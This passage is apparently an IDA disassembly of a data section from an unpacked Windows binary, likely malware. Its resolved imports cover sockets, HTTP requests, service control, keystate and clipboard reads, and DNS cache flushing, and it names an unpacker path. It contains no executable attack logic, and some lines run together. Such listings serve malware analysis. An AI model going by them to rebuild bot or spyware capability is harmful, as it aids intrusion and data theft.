dword_43A44C dd 71AC0979h ; resolved to->WS2_32.WSAAsyncSelect ; sub_406217+6B2�r ...
dword_43A450 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA ; sub_412B6A+ED�r
dword_43A454 dd 73B81B0Fh ; sub_409848+3B1D�r
dword_43A458 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40402D+E2�r ...
dword_43A45C dd 7E45A045h ; resolved to->USER32.ExitWindowsEx ; sub_407554+15�r
dword_43A460 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_403482+2B�r ...
dword_43A464 dd 71B2517Fh ; sub_406217+B1B�r ...
dword_43A468 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_40558B+3C4�r ...
dword_43A46C dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequencydword_43A470 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_406217+848�w ...
dword_43A474 dd 74343318h ; sub_406217+C18�r
dword_43A478 dd 77F1AC3Dh ; resolved to->GDI32.GetDIBColorTable ; sub_406217+462�w ...
dword_43A47C dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_404F3D+A1�r ...
dword_43A480 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_406217+39C�r ...
dword_43A484 dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_402402+7F�r ...
dword_43A488 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceA ; sub_406217+3B1�r ...
dword_43A48C dd 5B894364h ; sub_406217+A18�r ...
dword_43A490 dd 77DEAF3Fh ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_406217+3D1�r ...
dword_43A494 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_406217+5D8�w ...
dword_43A498 dd 71AB4489h ; resolved to->WS2_32.WSAIoctl ; sub_406217+6BE�r ...
dword_43A49C dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_406217+619�w ...
dword_43A4A0 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_406217+2BF�w ...
dword_43A4A4 dd 77DEB635h ; resolved to->ADVAPI32.ControlService ; sub_406217+3B9�r ...
dword_43A4A8 dd 76F3798Ah ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_406217+A6D�r ...
dword_43A4AC dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_40893A+116�r
dword_43A4B0 dd 743527D4h ; sub_406217+BF3�r
dword_43A4B4 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_406217+79E�r ...
dword_43A4B8 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_406217+736�r ...
dword_43A4BC dd 77DFCF32h ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_408421+AB�r
dword_43A4C0 dd 0 dword_43A4C4 dd 5B868E65h ; sub_406217+9F0�r ...
dword_43A4C8 dd 743452A3h ; sub_406217+C08�r
dword_43A4CC dd 7CA41110h ; resolved to->SHELL32.ShellExecuteA ; sub_406217+B75�r ...
dword_43A4D0 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_402858+2DA�r ...
dword_43A4D4 dd 77F19219h ; resolved to->GDI32.CreateDIBSection ; sub_406217+43B�w ...
dword_43A4D8 dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_406217+78E�r
dword_43A4DC dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_402C71+48F�r ...
dword_43A4E0 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_406217+323�r ...
dword_43A4E4 dd 7E41C505h ; resolved to->USER32.GetKeyState ; sub_405F16+F9�r ...
dword_43A4E8 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_406217+633�w ...
dword_43A4EC dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_402858+E3�r ...
dword_43A4F0 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_406217+2B9�r ...
dword_43A4F4 dd 7E430D7Ah ; resolved to->USER32.GetClipboardData ; sub_406217+1DA�r ...
dword_43A4F8 dd 71B2578Ch ; sub_406217+B28�r ...
dword_43A4FC dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_406217+316�r ...
dword_43A500 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_406217+3A9�r ...
dword_43A504 dd 77F1B221h ; resolved to->GDI32.CreateDCA ; sub_406217+42E�w ...
dword_43A508 dd 0CC0004h ; sub_406217+8BD�w ...
dword_43A50C dd 42C2CD78h ; resolved to->WININET.HttpSendRequestA ; sub_406217+872�r ...
dword_43A510 dd 42C5AE03h ; resolved to->WININET.InternetGetConnectedStateExA ; sub_406217+862�r ...
dword_43A514 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_402858+83�r ...
dword_43A518 dd 0 ; sub_406217+12B�w ...
dword_43A51C dd 0 ; sub_406EA4+1C�r
dword_43A520 dd 0 ; sub_406217:loc_40646C�w ...
dword_43A524 dd 0 ; sub_406EA4+50�r
dword_43A528 dd 0 ; sub_406217:loc_406546�w ...
dword_43A52C dd 0 ; sub_406EA4+84�r
dword_43A530 dd 0 ; sub_406EA4:loc_406F54�r
dword_43A534 dd 0 ; sub_406EA4+B8�r
dword_43A538 dd 0 ; sub_406EA4:loc_406F88�r
dword_43A53C dd 0 ; sub_406EA4+EC�r
dword_43A540 dd 0 ; sub_406217+8D1�w ...
dword_43A544 dd 0 ; sub_406EA4+120�r
dword_43A548 dd 0 ; sub_406EA4:loc_406FF0�r ...
dword_43A54C dd 0 ; sub_406EA4+154�r
dword_43A550 dd 0 ; sub_406EA4:loc_407024�r ...
dword_43A554 dd 0 ; sub_406EA4+188�r
dword_43A558 dd 0 ; sub_406EA4:loc_407058�r
dword_43A55C dd 0 ; sub_406EA4+1BC�r
dword_43A560 dd 0 ; sub_406EA4:loc_40708C�r
dword_43A564 dd 0 ; sub_406EA4+1F0�r
dword_43A568 dd 0 ; sub_406EA4:loc_4070C0�r
dword_43A56C dd 0 ; sub_406EA4+224�r
dword_43A570 dd 0 ; sub_406EA4:loc_4070F4�r
dword_43A574 dd 0 ; sub_406EA4+258�r
dword_43A578 dd 0 ; sub_406EA4:loc_407128�r
dword_43A57C dd 0 ; sub_406EA4+28C�r
dword_43A580 dd 0 ; sub_406EA4:loc_40715C�r
dword_43A584 dd 0 ; sub_406EA4+2C0�r
dword_43A588 dd 80h dup(0) dword_43A788 dd 17h dup(0) ; sub_4078AC+12D�o ...
dword_43A7E4 dd 0 ; sub_407BA7+5B�r ...
dword_43A7E8 dd 0 ; sub_407BA7+3E�w ...
align 10h
dword_43A7F0 dd 18h dup(0) ; sub_4080FF+12A�o
dword_43A850 dd 80h dup(0) ; sub_40822F+A9�o
dword_43AA50 dd 80h dup(0) ; sub_4082EB+60�o
dword_43AC50 dd 80h dup(0) ; sub_408363+83�o ...
dword_43AE50 dd 80h dup(0) ; sub_408540+8E�o ...
dword_43B050 dd 4 dup(0) dword_43B060 dd 0 ; sub_402C71+14E�o ...
dd 7Fh dup(0)
dword_43B260 dd 0 ; sub_41381B+3E�w ...
dword_43B264 dd 0 ; sub_40195E:loc_401B70�r ...
dword_43B268 dd 0 ; sub_4119DF+A2�w ...
dword_43B26C dd 0 ; sub_40558B+78�w ...
dword_43B270 dd 0 ; sub_4100A7:loc_410124�r ...
dword_43B274 dd 0 ; sub_401141+269�w ...
byte_43B278 db 0 ; DATA XREF: sub_4096E9+57�o
; sub_409848+26AC�r ...
align 4
dd 2935h dup(0)
dword_445750 dd 0E9A8h dup(0)dword_47FDF0 dd 0 ; sub_413732+13�o ...
dword_47FDF4 dd 20h dup(0) dword_47FE74 dd 10h dup(0) dword_47FEB4 dd 24h dup(0) dword_47FF44 dd 0 ; sub_40FB4C+4D7�w ...
dword_47FF48 dd 0 dd 3 dup(0)
dword_47FF58 dd 0 ; sub_401DFF+62�r ...
dd 5 dup(0)
dword_47FF70 dd 0 ; sub_409848+9D9�r
dd 1Fh dup(0)
dword_47FFF0 dd 0 ; sub_413941+19�o
dword_47FFF4 dd 2B9h dup(0) dword_480AD8 dd 2FE1h ; sub_401DFF+47�o ...
byte_480ADC db 0 ; DATA XREF: sub_40946D+2A�r
; sub_40946D+33�o
align 10h
dword_480AE0 dd 0 ; sub_40FB4C:loc_40FFBC�w ...
dword_480AE4 dd 0 ; sub_40FB4C+40A�w
dword_480AE8 dd 0 ; sub_410729+87�o
dword_480AEC dd 0 ; sub_41059C+119�r ...
dword_480AF0 dd 0 ; sub_410729+115�w
dword_480AF4 dd 0 ; sub_41059C+32�r ...
dword_480AF8 dd 0Dh dup(0) ; sub_41059C+114�o ...
dword_480B2C dd 0 ; sub_41059C+53�r ...
dd 0
dword_480B34 dd 0 align 10h
dword_480B40 dd 80h dup(0) byte_480D40 db 0 ; DATA XREF: sub_411FED:loc_41204A�r
; sub_411FED+93�w
align 4
dword_480D44 dd 0Dh dup(0) dword_480D78 dd 101h dup(0) ; .text:00414F44�o ...
dword_48117C dd 0 dword_481180 dd 0 dword_481184 dd 2 ; sub_41A039�r ...
dword_481188 dd 0A28h ; .text:004186FD�w
dword_48118C dd 501h dword_481190 dd 5 ; sub_41A039+9�r ...
dword_481194 dd 1 dword_481198 dd 1 ; sub_41DF17+8F�w
dword_48119C dd 323270h ; sub_40FB4C+314�r ...
dd 0
dword_4811A4 dd 323290h ; sub_41DCE4:loc_41DD95�r ...
dd 3 dup(0)
off_4811B4 dd offset aCM_unpackerPac ; DATA XREF: sub_41DF17+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4811BC db 0 ; DATA XREF: sub_418350+35�w
; sub_41B0EE+5�r
align 10h
dword_4811C0 dd 0 dword_4811C4 dd 0 ; sub_418350+C1�w
dword_4811C8 dd 0 ; sub_41DCE4:loc_41DCF6�r ...
align 10h
dword_4811D0 dd 0 align 10h
dword_4811E0 dd 144BA0h, 0FFFFFFFFh, 4 dup(0) ; .text:off_432538�o
dword_4811F8 dd 144BC8h, 0FFFFFFFFh, 4 dup(0)dword_481210 dd 144BF0h, 0FFFFFFFFh, 4 dup(0) dd 144C18h, 0FFFFFFFFh, 4 dup(0)
dword_481240 dd 144C40h, 0FFFFFFFFh, 4 dup(0) dd 144C68h, 0FFFFFFFFh, 4 dup(0)
db 90h
db 4Ch, 14h, 0
dd 0FFFFFFFFh, 4 dup(0)
dword_481288 dd 144CB8h, 0FFFFFFFFh, 4 dup(0)dword_4812A0 dd 144CE0h, 0FFFFFFFFh, 4 dup(0) dd 144D08h, 0FFFFFFFFh, 4 dup(0)
dd 144D30h, 0FFFFFFFFh, 4 dup(0)
dword_4812E8 dd 144D58h, 0FFFFFFFFh, 4 dup(0) dd 144D80h, 0FFFFFFFFh, 4 dup(0)
dd 144DA8h, 0FFFFFFFFh, 4 dup(0)
dword_481330 dd 0 dword_481334 dd 0 ; sub_417003+147�r ...
dword_481338 dd 0 ; sub_41C5A4:loc_41C5CD�w ...
dword_48133C dd 1 ; sub_41C1A9+31�w ...
dd 2 dup(0)
dword_481348 dd 1 ; sub_41D36B+1D�w ...
dword_48134C dd 0 aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41DF17+23�o
; .text:off_4811B4�o
align 4
dd 3Ah dup(0)
byte_481454 db 0 ; DATA XREF: sub_41DF17:loc_41DF2E�w
align 4
dword_481458 dd 1 ; sub_41DFB9+24�w ...
dword_48145C dd 1 ; sub_41E950+2E�w ...
dword_481460 dd 0 ; .text:off_432D8C�o ...
dword_481464 dd 0 dword_481468 dd 0 dd 0Bh dup(0)
dword_481498 dd 0 ; sub_41E950+14A�r ...
dd 3 dup(0)
dword_4814A8 dd 0 ; sub_41C1A9+272�r ...
dd 0Ah dup(0)
dword_4814D4 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_41EFD0+39�w ...
dword_4814D8 dd 0 dword_4814DC dd 0 dword_4814E0 dd 77C2807Ch ; sub_42055D+182�r ...
dword_4814E4 dd 0 ; resolved to->USER32.MessageBoxA ; sub_4207EB+38�w ...
dword_4814E8 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_4207EB:loc_4208B0�r
dword_4814EC dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_4207EB+D6�r
dword_4814F0 dd 0 ; resolved to->USER32.GetProcessWindowStation ; sub_4207EB:loc_42086B�r
dword_4814F4 dd 0 ; resolved to->USER32.GetUserObjectInformationA ; sub_4207EB+9C�r
dd 30h dup(0)
dword_4815B8 dd 0 dword_4815BC dd 0 ; sub_4213F3+87�r
dword_4815C0 dd 0 ; sub_4213F3+4D�r
dword_4815C4 dd 0 ; sub_4213F3+40�r
dword_4815C8 dd 0 ; sub_4213F3+5A�r
dd 4 dup(0)
dword_4815DC dd 0 ; sub_421A4A+31�w ...
dword_4815E0 dd 0 ; sub_421CFA+2E�w ...
dword_4815E4 dd 0 dword_4815E8 dd 0 dword_4815EC dd 0 dword_4815F0 dd 20h ; sub_41B454+F�r ...
align 10h
dword_481600 dd 321F20h ; sub_41AD93+5B�r ...
dword_481604 dd 3Fh dup(0) dword_481700 dd 0 ; sub_41CFD4+87�r ...
dword_481704 dd 323048h ; sub_41D166:loc_41D1A5�r ...
dword_481708 dd 0 ; sub_41D1D5+F5�w ...
dd 5 dup(0)
byte_481720 db 0 ; DATA XREF: sub_41CFAB+6�o
; sub_41D1D5+55�o ...
byte_481721 db 0 ; DATA XREF: sub_41809F+5E�r
; sub_41CFD4+107�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_481824 dd 4E4h ; sub_41CFD4+19�r ...
align 10h
word_481830 dw 0 ; DATA XREF: sub_41CFAB+1F�o
; sub_41D1D5+10C�o ...
align 10h
byte_481840 db 0 ; DATA XREF: sub_41CFD4:loc_41D0E9�w
; sub_41CFD4:loc_41D106�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_481940 dd 324428h ; sub_41AF67+51�r ...
dd 7 dup(0)
dword_481960 dd 400h dup(0) ; .text:00432660�o
dword_482960 dd 200h ; sub_41B045�r ...
dword_482964 dd 0 ; sub_41A27A+21C�r ...
dword_482968 dd 0 ; sub_41A24F�r ...
dword_48296C dd 0 ; sub_41A24F+8�r ...
dword_482970 dd 0 ; sub_417003+6C�r ...
dword_482974 dd 0 ; sub_41A27A+300�w ...
dword_482978 dd 0 ; sub_41A592+5�r ...
dword_48297C dd 0 ; sub_41A27A+249�r ...
dword_482980 dd 320000h ; sub_416D78+5D�r ...
dword_482984 dd 1 ; sub_416D78+F�r ...
dword_482988 dd 142340h ; sub_41DC7B+F�r ...
dword_48298C dd 1 dword_482990 dd 324C34h ; sub_418350:loc_4183AA�r ...
dword_482994 dd 324C30h ; sub_418350+62�r ...
dword_482998 dd 1 ; sub_41D4BB+11�w ...
align 800h
_text ends
; Section 3. (virtual address 00084000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00084000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 484000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start